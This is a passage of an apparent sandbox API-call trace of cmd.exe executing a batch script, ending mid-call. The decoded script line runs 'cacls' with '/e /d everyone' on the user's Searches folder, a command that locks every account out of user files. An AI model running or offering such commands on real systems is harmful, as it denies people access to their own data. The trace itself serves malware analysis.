hTemplateFile=0x0) returned 0x80 [0035.882] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0035.882] _get_osfhandle (_FileHandle=3) returned 0x80 [0035.882] SetFilePointer (in: hFile=0x80, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0035.882] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0035.882] ReadFile (in: hFile=0x80, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x710, lpOverlapped=0x0) returned 1 [0035.882] SetFilePointer (in: hFile=0x80, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0035.883] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n\r\n=%%i\r\n") returned 64 [0035.883] GetFileType (hFile=0x80) returned 0x1 [0035.883] _get_osfhandle (_FileHandle=3) returned 0x80 [0035.883] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0035.883] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="5JgHKoaOfdp") returned 0xb [0035.883] _wcsicmp (_String1="echo", _String2=")") returned 60 [0035.883] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0035.883] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0035.883] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0035.883] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0035.883] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0035.883] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0035.883] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0035.883] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0035.883] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0035.883] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0035.883] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0035.883] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0035.883] _tell (_FileHandle=3) returned 926 [0035.883] _close (_FileHandle=3) returned 0 [0035.883] _pipe (in: _PtHandles=0xd261d0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xd261d0) returned 0 [0035.884] _dup (_FileHandle=1) returned 5 [0035.884] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0035.884] _close (_FileHandle=4) returned 0 [0035.884] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0035.884] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0035.884] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0035.884] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0035.884] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0035.884] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0035.884] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0035.884] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0035.884] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0035.884] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0035.884] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0035.884] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0035.884] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0035.884] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0035.884] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0035.884] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0035.884] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0035.884] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0035.884] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0035.884] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0035.884] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.884] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0035.884] SetErrorMode (uMode=0x0) returned 0x0 [0035.884] SetErrorMode (uMode=0x1) returned 0x0 [0035.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0xd18268, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0xc8ecc4*="system32") returned 0x13 [0035.884] SetErrorMode (uMode=0x0) returned 0x1 [0035.884] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0035.884] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.884] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.884] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0xc8ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea70) returned 0xd183a8 [0035.885] FindClose (in: hFindFile=0xd183a8 | out: hFindFile=0xd183a8) returned 1 [0035.885] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0035.885] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0035.885] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.885] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0035.885] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0035.885] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.885] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.886] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.886] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0035.886] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0035.886] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0035.886] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0035.886] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0035.886] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0035.886] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0035.886] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.886] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.886] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0035.886] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0035.886] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0035.886] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0035.886] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessInformation=0xc8ee4c*(hProcess=0x94, hThread=0x8c, dwProcessId=0xb78, dwThreadId=0xb7c)) returned 1 [0035.890] CloseHandle (hObject=0x8c) returned 1 [0035.890] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0035.890] GetEnvironmentStringsW () returned 0xd15f98* [0035.890] FreeEnvironmentStringsA (penv="=") returned 1 [0035.890] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0035.890] _get_osfhandle (_FileHandle=3) returned 0x80 [0035.890] DuplicateHandle (in: hSourceProcessHandle=0x94, hSourceHandle=0x80, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0035.890] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0035.890] _close (_FileHandle=5) returned 0 [0035.890] _dup (_FileHandle=0) returned 4 [0035.890] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0035.890] _close (_FileHandle=3) returned 0 [0035.890] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0035.890] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0035.890] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0035.890] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0035.890] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0035.890] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0035.890] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0035.890] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0035.890] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0035.890] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0035.890] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0035.890] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0035.890] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0035.890] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0035.891] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0035.891] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0035.891] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0035.891] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0035.891] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0035.891] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0035.891] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0035.891] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0035.891] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0035.891] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0035.891] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0035.891] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0035.891] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0035.891] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0035.891] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0035.891] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0035.891] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0035.891] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0035.891] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0035.891] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0035.891] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0035.891] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0035.891] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0035.891] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0035.891] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0035.891] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0035.891] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0035.891] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0035.891] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0035.891] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0035.891] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0035.891] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0035.891] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0035.891] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0035.891] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0035.891] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0035.891] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0035.891] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0035.891] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0035.891] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0035.891] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0035.891] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0035.891] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0035.891] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0035.891] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0035.891] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0035.891] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0035.891] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0035.891] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0035.891] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0035.891] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0035.891] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0035.891] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0035.891] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0035.891] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0035.892] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0035.892] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0035.892] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0035.892] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0035.892] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0035.892] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0035.892] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0035.892] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0035.892] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0035.892] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0035.892] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0035.892] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0035.892] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0035.892] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0035.892] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0035.892] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0035.892] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0035.892] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0035.892] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0035.892] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0035.892] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0035.892] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0035.892] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0035.892] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0035.892] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0035.892] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0035.892] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0035.892] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0035.892] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0035.892] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0035.892] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0035.892] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0035.892] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0035.892] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0035.892] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0035.892] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0035.892] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0035.892] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0035.892] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0035.892] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0035.892] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0035.892] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0035.892] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0035.892] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0035.892] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0035.892] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0035.892] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0035.892] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0035.893] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0035.893] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0035.893] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0035.893] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0035.893] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0035.893] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0035.893] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0035.893] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0035.893] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0035.893] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0035.893] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0035.893] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0035.893] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0035.893] SetErrorMode (uMode=0x0) returned 0x0 [0035.893] SetErrorMode (uMode=0x1) returned 0x0 [0035.893] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd1baf0, lpFilePart=0xc8ef1c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ef1c*="Desktop") returned 0x1c [0035.893] SetErrorMode (uMode=0x0) returned 0x1 [0035.893] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.893] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.893] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.893] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.893] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0035.893] GetLastError () returned 0x2 [0035.893] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.893] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18540 [0035.893] FindClose (in: hFindFile=0xd18540 | out: hFindFile=0xd18540) returned 1 [0035.893] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0035.894] GetLastError () returned 0x2 [0035.894] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18540 [0035.894] FindClose (in: hFindFile=0xd18540 | out: hFindFile=0xd18540) returned 1 [0035.894] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.894] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.894] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0035.894] SetErrorMode (uMode=0x0) returned 0x0 [0035.894] SetErrorMode (uMode=0x1) returned 0x0 [0035.894] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd15fa0, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ecc4*="Desktop") returned 0x1c [0035.894] SetErrorMode (uMode=0x0) returned 0x1 [0035.894] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.894] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.894] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.894] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.894] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0035.894] GetLastError () returned 0x2 [0035.894] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.894] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd1bef0 [0035.894] FindClose (in: hFindFile=0xd1bef0 | out: hFindFile=0xd1bef0) returned 1 [0035.894] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0035.895] GetLastError () returned 0x2 [0035.895] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd1bef0 [0035.895] FindClose (in: hFindFile=0xd1bef0 | out: hFindFile=0xd1bef0) returned 1 [0035.895] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.895] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.895] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.895] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0035.895] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0035.895] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0035.895] _wcsnicmp (_String1="COPYCMD", 